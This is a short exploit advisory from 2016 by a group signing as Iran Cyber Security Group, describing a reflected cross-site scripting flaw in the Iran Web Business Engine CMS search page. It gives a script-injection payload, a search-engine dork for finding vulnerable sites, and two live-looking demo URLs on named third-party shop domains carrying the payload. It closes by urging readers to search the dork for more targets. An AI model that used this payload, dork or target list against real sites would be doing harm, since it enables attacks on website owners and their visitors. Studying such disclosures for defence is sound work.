/=====================================================================
Exploit Title : Iran Web Business Engine CMS CS Cross Site Scripting (XSS)
Exploit Author : Iran Cyber Security Group
Discovered By : 0x3a
Date : 16 April , 2016
Vendor HomePage : www.iranweb.biz
Version : 1.0 (Q1)
Tested On : WinXP
/=====================================================================
[+]Cross Site Scripting (XSS) :
Payload : "><script>alert("XSS VulnerabiliT By 0x3a")</script>
Dork : intext:Powered by Iran Web Business Engine
Demo :
1) www.shop.navitel.ir/search.asp?q="><script>alert("XSS VulnerabiliT By 0x3a")</script>
2) www.soleusshop.ir/search.asp?q="><script>alert("XSS VulnerabiliT By 0x3a")</script>
Search The Dork To Find More Target
[+][+][+][+][+][+][+][+]
[+]WWW.IRAN-CYBER.NET[+]
[+][+][+][+][+][+][+][+]